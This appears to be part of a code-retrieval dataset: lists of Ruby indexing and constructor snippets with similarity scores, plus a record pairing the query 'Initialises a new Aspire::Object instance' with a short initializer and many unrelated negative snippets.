"def index name = nil, dictionary = 'english', &block\n search_name = ['search', name].compact.join('_')\n\n class_eval do\n named_scope search_name.to_sym, lambda { |term|\n # Let's extract the individual terms to allow for quoted terms.\n term = term.scan(/\"([^\"]+)\"|(\\S+)/).flatten.compact.map {|lex| \"'#{lex}'\"}.join(' & ')\n {\n :select => \"#{table_name}.*, ts_rank_cd((#{full_text_indexes.first.to_s}),\n to_tsquery(#{connection.quote(term)})) as rank\",\n :conditions =>\n [\"#{full_text_indexes.first.to_s} @@ to_tsquery(?)\", term],\n :order => 'rank DESC'\n }\n }\n end\n index_name = [table_name, name, 'fts_idx'].compact.join('_')\n (self.full_text_indexes ||= []) <<\n FullTextIndex.new(index_name, dictionary, self, &block)\n end",
"def with_index_lock\n lock_path = \"#{@index_file}.lock\"\n File.open(lock_path, \"w+\") do |f|\n f.flock(File::LOCK_EX)\n yield\n end\n end",
"def load_old_index\n file = File.open('/home/matt/Documents/programming/ruby/dmsw/index.html', 'rb')\n html = file.read.chomp\n file.close\n return html\nend",
"def indexAllItems\n begin\n Thread.current[:name] = \"index thread\" # label all stdout from this thread\n batch = emptyBatch({})\n\n # The resolver and catalog stuff below is to prevent BioMed files from loading external DTDs\n # (which is not only slow but also unreliable)\n classPath = \"/apps/eschol/erep/xtf/WEB-INF/lib/saxonb-8.9.jar:\" +\n \"/apps/eschol/erep/xtf/control/xsl/jing.jar:\" +\n \"/apps/eschol/erep/xtf/normalization/resolver.jar\"\n Nailgun.run(classPath, 0, \"-Dxml.catalog.files=/apps/eschol/erep/xtf/normalization/catalog.xml\") { |nailgun|\n loop do\n # Grab an item from the input queue\n Thread.current[:name] = \"index thread\" # label all stdout from this thread\n itemID = $indexQueue.pop\n itemID or break\n\n # Extract data and index it (in batches)\n begin\n Thread.current[:name] = \"index thread: #{itemID}\" # label all stdout from this thread\n indexItem(itemID, batch, nailgun)\n rescue Exception => e\n puts \"Error indexing item #{itemID}\"\n raise\n end\n\n # To avoid Saxon's Java process from growing gigantic, restart it once in a while.\n nailgun.callCount == 1000 and nailgun.restart\n end\n }\n\n # Finish off the last batch.\n batch[:items].empty? or $batchQueue << batch\n rescue Exception => e\n if $preindexMode\n raise e\n else\n puts \"Exception in indexAllItems: #{e} #{e.backtrace}\"\n end\n ensure\n $batchQueue << nil # marker for end-of-queue\n end\nend",
"def initialize(io, index_file=false)\n @io = io\n index_filename = \n case index_file\n when String then index_file\n when TrueClass then Dat::Index.index_filename(io.path)\n else\n nil\n end\n @index = Index.new\n if index_filename && File.exist?(index_filename)\n @index.from_byteindex!(index_filename)\n else\n @index.from_io!(@io)\n end\n\n if index_filename && !File.exist?(index_filename)\n @index.write(index_filename)\n end\n end",
"def set_index\n @index = Nokogiri::HTML(open(@url))\n end",
"def get_index\n # url = \"http://marketdata.set.or.th/mkt/marketsummary.do?language=th&country=TH\"\n # file = File.open('tmp/sample_index.html','w') do |f|\n # f.binmode\n # f << open(url).read\n # end\n file_name= 'tmp/sample_index.html'\n f = File.read(file_name)\n doc = Nokogiri::HTML(f)\n set_index = doc.css('tr:nth-child(8) td')[1].text\n render :text => string2f(set_index)\n end",
"def index_document(opts = {})\n params = document_path(opts)\n params[:body] = as_indexed_json\n es_client.index params\n end",
"def require_index(name); end",
"def require_index(name); end",
"def test_index\n Index.generate(TEST_FILE, index_filename)\n index = Index.new(TEST_FILE, index_filename)\n\n TEST_LINES.size.times do |i|\n assert_equal TEST_LINES[i], index[i]\n end\n\n assert_nil index[TEST_LINES.size]\n assert_nil index[7000]\n # Make sure random access works too\n assert_equal TEST_LINES[3], index[3]\n end",
"def get_index_from_gh # rubocop:disable Metrics/MethodLength, Metrics/AbcSize\n resp = Zip::InputStream.new URI(\"#{Hit::GHURL}index.zip\").open\n zip = resp.get_next_entry\n yaml = zip.get_input_stream.read\n index = RelatonBib.parse_yaml yaml, [Symbol]\n File.write path, index.to_yaml, encoding: \"UTF-8\"\n index\n end",
"def exec_index\n begin\n require 'fastri/version'\n fastri = true\n rescue LoadError\n fastri = false\n end\n if fastri\n if no_harm?\n $stderr.puts \"fastri-server -b\"\n else\n system \"fastri-server -b\"\n end\n else\n case config.installdirs\n when 'std'\n output = \"--ri-system\"\n when 'site'\n output = \"--ri-site\"\n when 'home'\n output = \"--ri\"\n else\n abort \"bad config: sould not be possible -- installdirs = #{config.installdirs}\"\n end\n\n if File.exist?('.document')\n files = File.read('.document').split(\"\\n\")\n files.reject!{ |l| l =~ /^\\s*[#]/ || l !~ /\\S/ }\n files.collect!{ |f| f.strip }\n else\n files = [\"lib\", \"ext\"]\n end\n\n opt = []\n opt << \"-U\"\n opt << output\n opt << files\n opt = opt.flatten\n\n if no_harm?\n puts \"rdoc #{opt.join(' ').strip}\"\n else\n #sh \"rdoc #{opt.join(' ').strip}\"\n require 'rdoc/rdoc'\n ::RDoc::RDoc.new.document(opt)\n end\n end\n end",
"def do_local_indexing(solr_doc); end",
"def index\n @index ||= Crawler::Index.new(base_uri)\n end",
"def reindex!\n indexed if generate_solr_index\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# Pull title out of text line\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif not title.nil?\n\t\t\t # Split title into individual words\n\t\t\t words = title.split(\" \")\n\n\t\t\t\t# Remove stop words\n\t\t\t\tstop_words = ['a', 'an', 'and', 'by', 'for', 'from', 'in', 'of', 'on',\n\t\t\t\t\t 'or', 'out', 'the', 'to', 'with']\n\n\t\t\t\tfor i in 0..stop_words.length-1\n\t\t\t\t\twords.delete(stop_words[i])\n\t\t\t\tend\n\n\t\t\t\t# Count subsequent words\n\t\t\t\tfor i in 0..words.length-2\n\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\tend\n\t\t\tend\n\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def index\n @@index ||= Ferret::Index::Index.new(default_index_params)\n end",
"def index\n @@index ||= Ferret::Index::Index.new(default_index_params)\n end",
"def index\n return patterned_index if params[:pattern].present?\n\n index_full\n end"
] | [
"0.7740468",
"0.7514854",
"0.73784924",
"0.71144867",
"0.7050467",
"0.6907303",
"0.6863395",
"0.6611522",
"0.65240586",
"0.65150326",
"0.6402281",
"0.6384633",
"0.6300359",
"0.62951237",
"0.62905693",
"0.6271485",
"0.6251466",
"0.62455493",
"0.6238742",
"0.6229582",
"0.6223811",
"0.61953807",
"0.6106859",
"0.610441",
"0.608467",
"0.6083383",
"0.60495365",
"0.6040124",
"0.6035305",
"0.6021565",
"0.60122204",
"0.600237",
"0.59869474",
"0.59827566",
"0.5974043",
"0.59631896",
"0.59273547",
"0.59268034",
"0.59221476",
"0.5915624",
"0.58821756",
"0.58762306",
"0.5872544",
"0.58424395",
"0.5827599",
"0.58011365",
"0.57617265",
"0.5751028",
"0.5749035",
"0.5748759",
"0.5745864",
"0.57456213",
"0.57415354",
"0.5739278",
"0.5735321",
"0.5729332",
"0.57280684",
"0.5724711",
"0.5720928",
"0.56960523",
"0.5679224",
"0.5663089",
"0.5657058",
"0.5628271",
"0.5610415",
"0.5596392",
"0.5585373",
"0.5584891",
"0.55838525",
"0.55805063",
"0.55747104",
"0.5571857",
"0.5562909",
"0.5548156",
"0.55458575",
"0.55456847",
"0.5544563",
"0.5539684",
"0.5537329",
"0.55216545",
"0.5508606",
"0.55029964",
"0.5502032",
"0.5499458",
"0.5493884",
"0.54922396",
"0.5479033",
"0.5478143",
"0.54731786",
"0.54731786",
"0.54661965",
"0.5463493",
"0.5461259",
"0.54514796",
"0.5441439",
"0.54397374",
"0.5434998",
"0.543118",
"0.543118",
"0.54295737"
] | 0.7027357 | 5 |
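The binary-search truncation inside the indexItem entry above is the subtlest part of that code: JSON encoding inflates the text by an amount that is hard to predict (escaping, separators), so instead of computing the overhead exactly, the code searches for the largest prefix of the text that keeps the whole record under the size cap. Below is a minimal, self-contained Ruby sketch of the same idea; MAX_TEXT_SIZE and the record shape are stand-ins here, not the real CloudSearch values.

require 'json'

MAX_TEXT_SIZE = 1024 * 1024 # assumed cap; the real limit comes from CloudSearch

# Returns record with :text set to the longest prefix of text that keeps
# the JSON-encoded record within limit bytes.
def fit_text_to_record(record, text, limit = MAX_TEXT_SIZE)
  record[:text] = text
  return record if JSON.generate(record).bytesize <= limit

  record[:text] = nil
  base = JSON.generate(record).bytesize
  # The block is false for small cuts and true for large ones, so bsearch
  # (find-minimum mode) returns the smallest cut that makes the record fit.
  cut = (0..text.size).bsearch do |n|
    JSON.generate({ text: text[0, text.size - n] }).bytesize + base < limit
  end
  record[:text] = text[0, text.size - cut]
  record
end

trimmed = fit_text_to_record({ type: 'add', id: 'qt0001' }, 'word ' * 300_000)
puts trimmed[:text].bytesize # comfortably under MAX_TEXT_SIZE

The size estimate double-counts a few bytes of braces, so the result is slightly conservative — the same trade-off the original makes in exchange for not modelling JSON overhead precisely.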
Use callbacks to share common setup or constraints between actions. | def set_item
@item = @klass.where(team_id: params[:team_id]).find(params[:id])
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def set_required_actions\n # TODO: check what fields change to asign required fields\n end",
"def action_hook; end",
"def run_actions; end",
"def define_action_hook; end",
"def actions; end",
"def define_action_helpers\n if super && action == :save\n @instance_helper_module.class_eval do\n define_method(:valid?) do |*args|\n self.class.state_machines.fire_event_attributes(self, :save, false) { super(*args) }\n end\n end\n end\n end",
"def add_actions; end",
"def callbacks; end",
"def callbacks; end",
"def setup *actions, &proc\n (@setup_procs ||= []) << [proc, actions.size > 0 ? actions : [:*]]\n end",
"def define_action_helpers; end",
"def post_setup\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def before_setup; end",
"def action_run\n end",
"def execute(setup)\n @action.call(setup)\n end",
"def define_action_helpers?; end",
"def set_actions\n actions :all\n end",
"def action_done(action)\n dispatch = { :migrate => :done_migrating, :map => :done_mapping, :reduce =>\n :done_reducing, :finalize => :done_finalizing } \n self.send dispatch[action[:action]], action\n end",
"def dependencies action, &block\n @actions.each do |other|\n if action[:requires].include? other[:provide]\n block.call other\n end\n end\n end",
"def setup!\n return unless @setup_procs\n http_actions = actions\n @setup_procs.each do |setup_proc|\n proc, actions = setup_proc\n @setup__actions = actions.map do |action|\n\n action.is_a?(Regexp) ?\n http_actions.select { |a| a.to_s =~ action } :\n action.is_a?(String) && action =~ /\\A\\./ ?\n http_actions.map { |a| a.to_s << action if format?(a).include?(action) }.compact :\n action\n\n end.flatten\n self.class_exec &proc\n @setup__actions = nil\n end\n @setup_procs = nil\n end",
"def before_actions(*logic)\n self.before_actions = logic\n end",
"def setup_handler\n end",
"def set_action(opts)\n opts = check_params(opts,[:actions])\n super(opts)\n end",
"def setup(action)\n @targets.clear\n unless action.item.target_filters.empty?\n @targets = SES::TargetManager.make_targets(action)\n else\n item = action.item\n if item.for_opponent?\n @targets = $game_troop.alive_members\n elsif item.for_dead_friend?\n @targets = $game_party.battle_members.select { |actor| actor.dead? }\n else\n $game_party.battle_members.select { |actor| actor.alive? }\n end\n end\n @item_max = @targets.size\n create_contents\n refresh\n show\n activate\n end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def workflow\n end",
"def revisable_shared_setup(args, block)\n class << self\n attr_accessor :revisable_options\n end\n options = args.extract_options!\n self.revisable_options = Options.new(options, &block)\n \n self.send(:include, Common)\n self.send(:extend, Validations) unless self.revisable_options.no_validation_scoping?\n self.send(:include, WithoutScope::QuotedColumnConditions)\n end",
"def setup\n @action = SampleActionAndroid.new(os_name: 'android',\n app_name: APP_PATH)\n end",
"def before(action)\n invoke_callbacks *self.class.send(action).before\n end",
"def process_action(...)\n send_action(...)\n end",
"def before_dispatch(env); end",
"def after_actions(*logic)\n self.after_actions = logic\n end",
"def setup\n # override and do something appropriate\n end",
"def setup(client)\n return unless @setup\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n actions.each do |action|\n action.execute(client)\n end\n self\n end",
"def setup(_context)\n end",
"def setup(resources) ; end",
"def validate_actions\n errors.add(:base, :should_give_at_least_one_action) if !manage? && !forecasting? && !read? && !api?\n end",
"def setup\n @resource_config = {\n :callbacks => {\n :before_create => nil,\n :after_create => nil,\n :before_update => nil,\n :after_update => nil,\n :before_destroy => nil,\n :after_destroy => nil,\n },\n :child_assoc => nil,\n :model => nil,\n :parent => nil,\n :path => nil,\n :permission => {},\n :properties => {},\n :relation => {\n :create => nil,\n :delete => nil,\n },\n :roles => nil,\n }\n end",
"def determine_valid_action\n\n end",
"def process_shared\n handle_taxes\n handle_shippings\n create_adjustments_from_params\n handle_status\n handle_inventory_refunds\n handle_payment_transactions\n order.updater.update\n end",
"def startcompany(action)\n @done = true\n action.setup\n end",
"def init_actions\n am = action_manager()\n am.add_action(Action.new(\"&Disable selection\") { @selection_mode = :none; unbind_key(32); bind_key(32, :scroll_forward); } )\n am.add_action(Action.new(\"&Edit Toggle\") { @edit_toggle = !@edit_toggle; $status_message.value = \"Edit toggle is #{@edit_toggle}\" })\n end",
"def event_callbacks(event, metadata={})\n case event\n when :reset, :review\n if confirmed\n update_attributes(confirmed: false)\n end\n when :confirm\n confirm\n # trigger :order for all applicable items\n # NOTE: :order event is common to both physical and digital items\n items.each do |i|\n if i.event_permitted(:order)\n user_id = last_transition.user_id\n i.trigger!(:order, { order_id: id, user_id: user_id })\n end\n end\n when :complete_work\n request = metadata[:request]\n work_complete_notification(request)\n when :close\n close\n end\n if event != :close && !open\n reopen\n end\n end",
"def setup_action\n return unless PONY::ERRNO::check_sequence(current_act)\n new_sequence = @action_sequence[@sequence_index+1...@action_sequence.size]\n @sequence_index = 0\n new_sequence = DND::SkillSequence::ACTS[@acts[1]] + new_sequence\n execute_sequence\n end",
"def define_tasks\n define_weave_task\n connect_common_tasks\n end",
"def setup(&block)\n define_method(:setup, &block)\n end",
"def setup\n transition_to(:setup)\n end",
"def setup\n transition_to(:setup)\n end",
"def action\n end",
"def setup( *args )\n\t\t\tself.class.setupBlocks.each {|sblock|\n\t\t\t\tdebugMsg \"Calling setup block method #{sblock}\"\n\t\t\t\tself.send( sblock )\n\t\t\t}\n\t\t\tsuper( *args )\n\t\tend",
"def config(action, *args); end",
"def setup\n @setup_proc.call(self) if @setup_proc\n end",
"def before_action \n end",
"def setup_callbacks\n defined_callbacks.each do |meth|\n unless respond_to?(\"call_#{meth}_callbacks\".to_sym)\n self.class.module_eval <<-EOE\n def call_#{meth}_callbacks(*args)\n plugin_store.each {|a| a.call_#{meth}_callbacks(*args) } if respond_to?(:plugin_store) && plugin_store\n self.send :#{meth}, *args if respond_to?(:#{meth})\n end\n EOE\n end\n end\n end",
"def action\n end",
"def matt_custom_action_begin(label); end",
"def setup\n # override this if needed\n end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def action(options,&callback)\n new_action = Action===options ? options : Action.new(options,&callback)\n # replace any with (shared name/alias or both default) + same arity\n @actions.delete_if do |existing_action|\n ((existing_action.names & new_action.names).size > 0 ||\n existing_action.default? && new_action.default?) &&\n existing_action.required.size == new_action.required.size &&\n existing_action.optional.size <= new_action.optional.size\n end\n @actions = (@actions + [new_action]).sort\n new_action\n end",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action\n end",
"def after(action)\n invoke_callbacks *options_for(action).after\n end",
"def pre_task\n end",
"def setup(server)\n server.on('beforeMethod', method(:before_method), 10)\n end",
"def add_actions\n attribute = machine.attribute\n name = self.name\n \n owner_class.class_eval do\n define_method(name) {self.class.state_machines[attribute].events[name].fire(self)}\n define_method(\"#{name}!\") {self.class.state_machines[attribute].events[name].fire!(self)}\n define_method(\"can_#{name}?\") {self.class.state_machines[attribute].events[name].can_fire?(self)}\n end\n end",
"def init_actions\n @select_action = SelectAction.new\n @endpoint_mouse_action = EndpointMouseAction.new\n @move_action = MoveAction.new\n end",
"def setup_signals; end",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action.respond_to?('weak!') ? action.weak! : action\n end",
"def initialize(*args)\n super\n @action = :set\nend",
"def after_set_callback; end",
"def setup\n #implement in subclass;\n end",
"def lookup_action; end",
"def setup &block\n if block_given?\n @setup = block\n else\n @setup.call\n end\n end",
"def setup_action\n return TSBS.error(@acts[0], 1, @used_sequence) if @acts.size < 2\n actions = TSBS::AnimLoop[@acts[1]]\n if actions.nil?\n show_action_error(@acts[1])\n end\n @sequence_stack.push(@acts[1])\n @used_sequence = @acts[1]\n actions.each do |acts|\n @acts = acts\n execute_sequence\n break if @break_action\n end\n @sequence_stack.pop\n @used_sequence = @sequence_stack[-1]\n end",
"def release_actions; end",
"def around_hooks; end",
"def save_action; end",
"def setup(easy)\n super\n easy.customrequest = @verb\n end",
"def action_target()\n \n end",
"def setup\n callback(:setup) do\n notify(:setup)\n migration_check.last_deployed_commit\n end\n end",
"def setup\n return unless @setup\n\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n run_actions_and_retry(actions)\n self\n end",
"def before_setup\n # do nothing by default\n end",
"def my_actions(options)\n @setup = false\n get_template_part(\"custom_used\",\"action_users\",true)\n end",
"def default_action; end",
"def setup(&blk)\n @setup_block = blk\n end",
"def callback_phase\n super\n end",
"def advice\n end",
"def _handle_action_missing(*args); end",
"def duas1(action)\n action.call\n action.call\nend",
"def shared_action(name, &block)\n @controller.shared_actions[name] = block\n end",
"def before_action action, &block\n @audience[:before][action] ||= Set.new\n @audience[:before][action] << block\n end",
"def setup_initial_state\n\n state_a = State.new(\"a\", 0)\n state_b = State.new(\"b\", 0)\n state_c = State.new(\"c\", 10)\n\n move_to_b = Action.new(\"move_to_b\", 1, state_b)\n\n move_to_c = Action.new(\"move_to_c\", 1, state_c)\n\n state_a.actions = [move_to_b, move_to_c]\n\n return state_a\n \nend"
] | [
"0.6163163",
"0.6045976",
"0.5946146",
"0.591683",
"0.5890051",
"0.58349305",
"0.5776858",
"0.5703237",
"0.5703237",
"0.5652805",
"0.5621621",
"0.54210985",
"0.5411113",
"0.5411113",
"0.5411113",
"0.5391541",
"0.53794575",
"0.5357573",
"0.53402257",
"0.53394014",
"0.53321576",
"0.53124547",
"0.529654",
"0.5296262",
"0.52952296",
"0.52600986",
"0.52442724",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.5232394",
"0.523231",
"0.5227454",
"0.52226824",
"0.52201617",
"0.5212327",
"0.52079266",
"0.52050185",
"0.51754695",
"0.51726824",
"0.51710224",
"0.5166172",
"0.5159343",
"0.51578903",
"0.51522785",
"0.5152022",
"0.51518047",
"0.51456624",
"0.51398855",
"0.5133759",
"0.5112076",
"0.5111866",
"0.5111866",
"0.5110294",
"0.5106169",
"0.509231",
"0.50873137",
"0.5081088",
"0.508059",
"0.50677156",
"0.50562143",
"0.5050554",
"0.50474834",
"0.50474834",
"0.5036181",
"0.5026331",
"0.5022976",
"0.5015441",
"0.50121695",
"0.5000944",
"0.5000019",
"0.4996878",
"0.4989888",
"0.4989888",
"0.49864885",
"0.49797225",
"0.49785787",
"0.4976161",
"0.49683493",
"0.4965126",
"0.4958034",
"0.49559742",
"0.4954353",
"0.49535993",
"0.4952725",
"0.49467874",
"0.49423352",
"0.49325448",
"0.49282882",
"0.49269363",
"0.49269104",
"0.49252945",
"0.4923091",
"0.49194667",
"0.49174926",
"0.49173003",
"0.49171105",
"0.4915879",
"0.49155936"
] | 0.0 | -1 |
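The set_item entry above is the standard Rails answer to this query: hoist the shared lookup into a private method and run it with a before_action callback. Here is a hedged sketch of how such a controller typically wires it up — ItemsController, Item and item_params are illustrative, not from the source, and the original's @klass suggests the real lookup class is injected by a parent controller.

class ItemsController < ApplicationController
  # Run the shared setup once, for every action that operates on one record.
  before_action :set_item, only: %i[show edit update destroy]

  def show
    # @item was loaded by the callback; nothing to do here.
  end

  def update
    if @item.update(item_params)
      redirect_to @item
    else
      render :edit
    end
  end

  private

  # Scoping to the team is a constraint as well as setup: find raises
  # ActiveRecord::RecordNotFound for ids outside params[:team_id].
  def set_item
    @item = Item.where(team_id: params[:team_id]).find(params[:id])
  end

  def item_params
    params.require(:item).permit(:name)
  end
end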
Initialises a new Aspire::Object instance | def initialize(uri, factory)
self.factory = factory
# Normalise the URL to the linked data form
self.uri = factory ? factory.cache.linked_data_url(uri) : uri
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def initialize(obj); end",
"def initialize object\n\t\tself.object = object\n\tend",
"def initialize\n initialize!\n end",
"def initialize\n initialize!\n end",
"def initialize() end",
"def initialize(object, response = nil)\n @object = object\n\n @end_date = object['end_date']\n @id = object['id']\n @jurisdiction = object['jurisdiction']\n @percentage = object['percentage']\n @start_date = object['start_date']\n @type = object['type']\n @response = response\n end",
"def initialize(object)\n @object = object\n end",
"def initialize(object)\n @object = object\n end",
"def initialize(object)\n @object = object\n end",
"def initialize(object)\n @object = object\n end",
"def initialize()\n end",
"def initialize\n @params_class = Spree::Adyen::HPP::Params\n @invoice_class = Spree::Adyen::Invoice\n end",
"def initialize(obj)\n @obj = obj\n end",
"def initialize(obj)\n @obj = obj\n end",
"def initialize(object)\n @id = object[\"id\"]\n @firstName = object[\"firstName\"]\n @lastName = object[\"lastName\"]\n @email = object[\"email\"]\n @phone = object[\"phone\"]\n @type = object[\"type\"]\n end",
"def initialize\n init\n end",
"def new\n @apex_class = ApexClass.new\n @apex_class_body = ''\n end",
"def initialize(object, response = nil)\n @object = object\n\n @amount = object['amount']\n @arrival_date = object['arrival_date']\n @created_at = object['created_at']\n @currency = object['currency']\n @deducted_fees = object['deducted_fees']\n @id = object['id']\n @links = object['links']\n @reference = object['reference']\n @status = object['status']\n @response = response\n end",
"def initialize(obj)\n __setobj__(obj)\n end",
"def initialize(obj)\n @base = obj\n end",
"def instantiate\n resource.new(data)\n end",
"def initialize\n \n end",
"def initialize(maker, sirens)\n super(maker)\n @sirens = sirens\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n end",
"def initialize()\n\t\tend",
"def initialize(api_obj)\n @api_obj = api_obj\n end",
"def initialize\n\t\t\n\t\t@dao = DAO.new 'rpg'\n\n\tend",
"def new()\n #This is a stub, used for indexing\n end",
"def initialize(object, response = nil)\n @object = object\n\n @actions = object['actions']\n @created_at = object['created_at']\n @fallback_enabled = object['fallback_enabled']\n @id = object['id']\n @links = object['links']\n @mandate_request = object['mandate_request']\n @metadata = object['metadata']\n @payment_request = object['payment_request']\n @purpose_code = object['purpose_code']\n @resources = object['resources']\n @status = object['status']\n @response = response\n end",
"def initialize(*) end",
"def initialize(*) end",
"def initialize(*) end",
"def initialize(*) end",
"def initialize(*) end",
"def initialize( uri, idobj )\n\t\t@data\t\t= {}\n\t\t@id\t\t\t= idobj\n\t\t@new\t\t= true\n\t\t@modified\t= false\n\n\t\tunless idobj.new?\n\t\t\tself.retrieve\n\t\tend\n\n\t\tsuper()\n\tend",
"def initialize(object = nil)\n self.object = object if object\n end",
"def initialize()\n\t\t######## Members\n\t\t##\n\t\t# Package name\n\t\t# \n\t\t# @var\tstring\n\t\t##\n\t\t@package = 'Sifter'\n\n\t\t##\n\t\t# Holds child objects\n\t\t# \n\t\t# @var\tobject\n\t\t##\n\t\t@contents = nil\n\n\t\t##\n\t\t# Capture result flag\n\t\t# \n\t\t# @var\tbool\n\t\t##\n\t\t@capture_result = false\n\n\t\t##\n\t\t# Result\n\t\t# \n\t\t# @var\tstring\n\t\t##\n\t\t@result = ''\n\n\t\t##\n\t\t# Holds replacements\n\t\t# \n\t\t# @var\tarray\n\t\t##\n\t\t@replace_vars = {}\n\tend",
"def initialize\n end",
"def initialize\n\t\t\n\tend",
"def initialize\r\n\r\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n\n\tend",
"def initialize\n\n\tend",
"def initialize(object)\n @id = object[\"id\"]\n @data = object[\"data\"]\n end",
"def initialize\n end",
"def constructor; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize; end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize\n super()\n end",
"def initialize(name)\n\t\t@client_name = name\n\t\t@object_builder = Rubbit_Object_Builder.instance(name)\n\t\t@rubbit_poster = Rubbit_Poster.instance(name)\n\t\t@me = nil\n\tend",
"def initialize(env)\n @traits = Class.new { include Attributes }.new( :waves => {} )\n @request = Rack::Request.new(env).freeze\n @response = Waves::Response.new( self )\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize\n end",
"def initialize(*args)\n @body = nil\n @headers = {}\n @http_version = '1.1'\n\n super\n end",
"def initialize(path)\n\t\tself.path = path\n\t\tself.client = self.class.client\n\tend",
"def initialize(invoice, cache = File.join(Dir.pwd, 'farm'), log: Log::NULL,\n farmer: Farmers::Plain.new, lifetime: 24 * 60 * 60, strength: Score::STRENGTH)\n @log = log\n @cache = File.expand_path(cache)\n @invoice = invoice\n @pipeline = Queue.new\n @farmer = farmer\n @threads = ThreadPool.new('farm', log: log)\n @lifetime = lifetime\n @strength = strength\n end",
"def initialize(object, response = nil)\n @object = object\n\n @amount = object['amount']\n @count = object['count']\n @created_at = object['created_at']\n @currency = object['currency']\n @day_of_month = object['day_of_month']\n @end_date = object['end_date']\n @id = object['id']\n @interval = object['interval']\n @interval_unit = object['interval_unit']\n @links = object['links']\n @metadata = object['metadata']\n @month = object['month']\n @name = object['name']\n @payment_reference = object['payment_reference']\n @start_date = object['start_date']\n @status = object['status']\n @upcoming_payments = object['upcoming_payments']\n @response = response\n end",
"def initialize(object, response = nil)\n @object = object\n\n @authorisation_source = object['authorisation_source']\n @consent_parameters = object['consent_parameters']\n @created_at = object['created_at']\n @id = object['id']\n @links = object['links']\n @metadata = object['metadata']\n @next_possible_charge_date = object['next_possible_charge_date']\n @payments_require_approval = object['payments_require_approval']\n @reference = object['reference']\n @scheme = object['scheme']\n @status = object['status']\n @verified_at = object['verified_at']\n @response = response\n end",
"def initialize()\r\n\r\n end",
"def initialize(payload); end",
"def initialize(*args)\n # First form is used by JiakResource.get and JiakResource.query\n @jiak = Struct.new(:object,:auto_update).new\n if(args.size == 1 && args[0].is_a?(JiakObject))\n @jiak.object = args[0]\n else\n bucket = self.class.jiak.bucket\n @jiak.object = JiakObject.new(:bucket => bucket,\n :data => bucket.data_class.new(*args))\n if(self.class.auto_post?)\n if(!@jiak.object.key.empty? && self.class.exist?(@jiak.object.key))\n raise(JiakResourceException,\n \"auto-post failed: key='#{@jiak.object.key}' already exists.\")\n end\n self.class.post(self)\n end\n end\n end",
"def initialize()\n\t\t@url = \"http://lcboapi.com/products\"\n\t\t@id = 0\n\t\t@term = \"\"\n\t\t@result = []\n\t\t@single = {}\n\tend",
"def initialize(object)\n @item = object[\"item\"]\n end",
"def initialize(attrs)\n @name = attrs.fetch(:name)\n @engine = Engine.new(attrs.fetch(:max_speed), attrs.fetch(:max_jump_length), attrs.fetch(:max_fuel_amount))\n @navigator = Navigator.new(self, attrs.fetch(:map), attrs.fetch(:current_star_system))\n @cargo_bay = CargoBay.new\n end",
"def initialize(db)\n @db = db\n #initialize the scraper with a database\n end",
"def initialize(object)\n @id = object[\"id\"]\n @value = object[\"value\"]\n @type = object[\"type\"]\n end",
"def initialize(object)\n @id = object[\"id\"]\n @value = object[\"value\"]\n @type = object[\"type\"]\n end"
] | [
"0.6506553",
"0.64798385",
"0.64382607",
"0.64382607",
"0.63833064",
"0.6297461",
"0.6266121",
"0.62586266",
"0.62586266",
"0.62586266",
"0.62398475",
"0.6231504",
"0.61862123",
"0.61862123",
"0.6167852",
"0.6160523",
"0.61445075",
"0.6125816",
"0.61192876",
"0.6094196",
"0.608374",
"0.60783935",
"0.6075078",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.60744363",
"0.6058386",
"0.6053201",
"0.60495335",
"0.60493124",
"0.60351837",
"0.6028316",
"0.6028316",
"0.6028316",
"0.6028316",
"0.6028316",
"0.60192",
"0.6018719",
"0.600788",
"0.59974164",
"0.5990899",
"0.59876627",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985729",
"0.5985198",
"0.5985198",
"0.59744936",
"0.5966495",
"0.5961661",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5960182",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5949068",
"0.5946061",
"0.5944287",
"0.59407437",
"0.59407437",
